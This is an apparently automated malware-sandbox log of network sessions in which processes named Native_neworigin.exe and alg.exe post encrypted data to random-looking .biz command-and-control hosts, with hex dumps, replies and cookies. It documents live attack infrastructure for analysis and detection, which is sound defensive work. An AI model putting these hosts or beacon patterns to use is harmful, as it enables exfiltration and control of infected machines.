                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:41.513278961 CET778OUTData Raw: b0 bd 0a 75 2b 58 52 90 fe 02 00 00 53 c3 bb b6 f0 3c 0d 42 2f e7 cd d6 b8 8c 40 2d 96 ff fc ba 2e 27 e5 19 d6 fe 78 83 57 43 9b 2a 20 e9 be ee fd c5 9f a1 cd 88 e0 2d d4 90 af 6e 2b d6 4a a5 14 b5 61 64 09 67 54 e5 bb 4c 47 56 40 b2 f1 12 e9 d2
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: u+XRS<B/@-.'xWC* -n+JadgTLGV@@#*h OMr~C2bh;1K4\+469kh@99MU|z@UtT+Wo[M"eDOb3e8oP}8IQ9c


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    11192.168.2.104979018.141.10.107803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:42.421621084 CET348OUTPOST /qmpy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:42.421621084 CET836OUTData Raw: 7f de 79 2f 6a cf d0 f0 38 03 00 00 2f 07 e3 53 b8 cc ed 31 da 63 56 1d e6 e7 7b 68 c4 2f 5b 87 62 ad 6d 2f 8d 2e 6e 33 3a 77 b2 5f 70 0c 36 24 43 ca f3 d1 44 cc 3f 42 84 d5 0c 2c 9e 04 2e 99 99 b5 d1 73 8d a7 e3 dc a3 ab 60 2f c0 5f d8 37 f0 c5
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: y/j8/S1cV{h/[bm/.n3:w_p6$CD?B,.s`/_7@Z&?g1{?A?Zfg$^>_5~_;2(bA}zwL<X2b=$Rm^D{L+>&iX-%
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:44.585103035 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:44 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=e344f1409f05f3996938736ae49ae0ed|8.46.123.75|1732605164|1732605164|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    12192.168.2.1049797172.234.222.143806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:45.742147923 CET358OUTPOST /blhkiobysomvisx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:45.742712975 CET778OUTData Raw: fe 01 4d 9c 8a e4 56 ae fe 02 00 00 31 f6 95 d8 f6 f9 39 82 97 ef 27 23 ca dc d8 9e 12 d7 90 e2 e0 dd 06 57 ca 43 ca ca 48 94 fe 8f 3a 5f 89 b6 95 23 be 9d 2e 3e 6f a5 a7 73 f6 b0 db 79 47 c6 41 01 bd 55 02 bf ff 57 e4 ab 5d 16 13 2d 1e 02 a1 77
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: MV19'#WCH:_#.>osyGAUW]-w 'P;bNTKEvxhqS NX_AYw\&!+`=aN=_JOYTFI2M_^MOBF^M<wWask`xp~"TK


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    13192.168.2.104980318.141.10.107806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.107767105 CET358OUTPOST /aatpwqmmnwrfjm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.108041048 CET778OUTData Raw: c5 77 32 3b 61 5d 92 20 fe 02 00 00 b5 97 0f e4 89 9b 70 97 07 7d 92 7d af 2d a6 0a 0e a0 1d 4d 0c bb c9 fc 23 f7 0f a4 5e 37 45 88 40 78 77 9c 85 41 a0 1b bb 73 dc 9f f4 f3 58 02 c8 43 6b 2f 2a e8 35 b5 68 c8 54 e1 3c 78 d0 22 13 12 eb 70 b8 29
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: w2;a] p}}-M#^7E@xwAsXCk/*5hT<x"p)O"?n\S6$(=7A(n(vM QGP=x/sIY#`yJ`-2<jy,vgz~&jErgGJ[u<S*eoP[U.y~+]l]E_lN
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.105474949 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:49 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7c27b64cfccfbe7f3c07d1ec72051b8d|8.46.123.75|1732605169|1732605169|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    14192.168.2.104981482.112.184.197806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.546036959 CET349OUTPOST /hrkmkab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.546060085 CET778OUTData Raw: 12 23 f5 1f a9 24 db f3 fe 02 00 00 d2 aa be a5 56 9c 8f 36 bd 23 7a 72 ab f5 2a 48 72 59 67 5c 0a 8c 2b 3d 94 8d 37 1e 40 2d 21 df 42 fc 28 a8 a9 99 c5 69 b5 0d 38 15 85 e6 19 25 72 da e5 a8 c5 7f c2 47 4f ca 5a 58 42 a4 9a 38 e9 71 4d 2a 29 6e
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #$V6#zr*HrYg\+=7@-!B(i8%rGOZXB8qM*)nGVo|o]o~:\#z.L}=;vxl@jNTn1.)c/Zgc/3$GF<msBTPbnI"Q


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    15192.168.2.104983154.244.188.177807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.691529036 CET358OUTPOST /tkvpxcpexicoa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.691556931 CET834OUTData Raw: e6 3f 48 e0 2c 7c a0 ec 36 03 00 00 8a fc 58 a7 a6 70 7f 7f 2b 3b a9 db af 87 f7 a0 66 83 d8 7f 78 de 46 ee 24 b9 bc eb 4f 6a 26 4c a1 f9 2d eb b3 19 ee b6 98 71 96 9c dc db f5 b7 ee d2 a7 38 fa b3 59 4d 56 97 85 af a9 64 23 76 b7 f9 82 39 68 2a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ?H,|6Xp+;fxF$Oj&L-q8YMVd#v9h*~NmDMR(,eby-Oqh-'irrF8FPu~11Pt!+24.E>Kr`'D/,J&ZM0:8Yb|P;LCD
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.146298885 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=213b0bde1cbf9ebf8bae22d303658ff7|8.46.123.75|1732605181|1732605181|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    16192.168.2.104983318.141.10.107807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.508841991 CET350OUTPOST /bmgwtyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.508841991 CET834OUTData Raw: 06 cc e7 04 50 b5 1a de 36 03 00 00 69 90 1c e8 51 86 5e da 21 53 69 b7 c1 dc 06 e4 6b 2f f7 44 6e 77 f2 6d c2 e0 d3 7f 0e 84 79 5a 05 89 74 3d f1 b9 1a 1d f8 af 4f 8b 12 f5 16 44 8e 1d 5b 00 f7 c6 b2 96 a4 81 f0 2d 37 90 c4 5c 12 ef 2f ae 81 80
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: P6iQ^!Sik/DnwmyZt=OD[-7\/~0fo=##y._F\Bwv`uO(S!6'Fc0ddes1-ugMfbt#Bi=F'B;{nNUJD28XNX
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.633460045 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:04 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=3e20e614ffb57b55ecc3891ac6585cf5|8.46.123.75|1732605184|1732605184|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    17192.168.2.104983954.244.188.177807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.933401108 CET354OUTPOST /ghffopumxhoiq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.933435917 CET834OUTData Raw: ec cc b6 86 db 41 ce 1a 36 03 00 00 b3 c0 b4 4d 39 6d 7d d3 d1 72 0a 1e 4b ae 22 4b 79 3b 0d ec 71 be a6 95 d7 f1 74 45 93 61 46 7a 44 d4 02 16 a4 d8 97 d8 56 7d 55 cd 50 79 ab a8 d2 c4 b2 17 9e 6c af 3a 42 83 d1 bb 4c 80 4c 11 71 c2 8a 39 73 96
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: A6M9m}rK"Ky;qtEaFzDV}UPyl:BLLq9s =32^>T<l#[7u{(:gQg\^+s!i146(x!D&^ux/1?!Af4 %!uDep,?l3I-tj
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.385684013 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=aaf51ac5adc1a43092422c7e2cfc1d24|8.46.123.75|1732605186|1732605186|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    18192.168.2.104984644.221.84.105807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.665132999 CET347OUTPOST /bgr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.665157080 CET834OUTData Raw: 52 a0 0b 76 1e 9e 22 3a 36 03 00 00 a1 6a 15 b3 02 c8 63 2d 66 6d e3 58 31 54 ca 2b 8c 47 1f 87 32 f8 d6 ae 23 b4 c3 2e c3 2d 1e 54 a8 cf a5 24 3f 8c 61 1f 05 e7 38 92 08 44 27 fc 13 26 c2 73 03 35 d1 4c eb 30 2f 45 7c 8f 45 96 5f 67 da 29 42 b7
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Rv":6jc-fmX1T+G2#.-T$?a8D'&s5L0/E|E_g)BFaw"m4dJPJ<3,*=@)>),rs:1$xyw45p`-N:n+_n&L1mI\})&}ERt%a6P"DiOM{}q6_=A(;
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:07.854161978 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=2dc74860b8aa8b6b86b8ac6dff52f003|8.46.123.75|1732605187|1732605187|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    19192.168.2.1049851172.234.222.143807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:08.165918112 CET347OUTPOST /fafj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:08.165918112 CET834OUTData Raw: b8 2b 52 8a 49 80 70 12 36 03 00 00 17 8f 70 2d e7 f7 17 79 d1 25 97 c4 ae ef 87 cd 64 89 6b 2a 1e 0d b0 a2 26 75 cb 38 36 52 99 29 31 1f b8 03 1e 53 74 0d ec a5 06 28 e1 3b 9b d3 ef 4c 15 1f 6f 07 5e ae 19 16 a2 58 6e 77 12 58 8d 9b c6 f1 e7 e3
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: +RIp6p-y%dk*&u86R)1St(;Lo^XnwXbp[)3xYR?B%lVdD{y`jZP)5Fl*Pcr(EElAt.@4vfA&"k!s*F}{:3


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    20192.168.2.1049853172.234.222.143807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:09.488784075 CET357OUTPOST /dadmwtnbmefxvi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:09.488806009 CET834OUTData Raw: 2d ea 59 cb 26 31 28 af 36 03 00 00 da 40 bf f2 1f 08 07 5a df 80 b8 79 29 1a 1b 03 b1 13 ea bc 8d 0a 1e 79 36 f5 e3 de 06 03 2e 18 98 d5 a4 87 b5 97 b5 c2 3c 45 44 56 40 93 26 03 ac 29 a5 7d e9 0a b7 67 14 b3 9c 4a 7f 24 26 ae 73 5b 1f 7c 6d 22
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: -Y&1(6@Zy)y6.<EDV@&)}gJ$&s[|m"CK|IYH<UD@Vo4'Y`?B}+<`'"6>oir7fo`2mV~_[)tJrsB3l]C;D,7B.


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    21192.168.2.104986018.141.10.107807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:11.145468950 CET358OUTPOST /wofnqkoxvbvigg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:11.145782948 CET834OUTData Raw: cd 12 e9 a2 2f 0f cc aa 36 03 00 00 53 61 ce 7b 4d 55 5e 0c 92 71 56 da cc 94 e6 fd 68 e1 14 6b f7 80 8b 50 66 3f 4d 05 80 da 84 d0 cd cf 45 b9 f4 7d 85 ad d0 aa 30 21 98 f7 c3 f7 9c 63 9d 57 97 6a a3 3a 38 25 58 06 bd 27 2c 33 dc 47 d7 50 f5 03
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /6Sa{MU^qVhkPf?ME}0!cWj:8%X',3GP7|,fA%9]M*00WCb+9K$VhZCij(!Yu"uJ.rkc+U3Bsf{$pwoLp3|rSR<!A8la4Vvl(=
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.220674038 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:12 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=2660d4084d1da275e8a6bf0ac7a0d8bb|8.46.123.75|1732605192|1732605192|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    22192.168.2.104986782.112.184.197807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813477993 CET345OUTPOST /ccx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
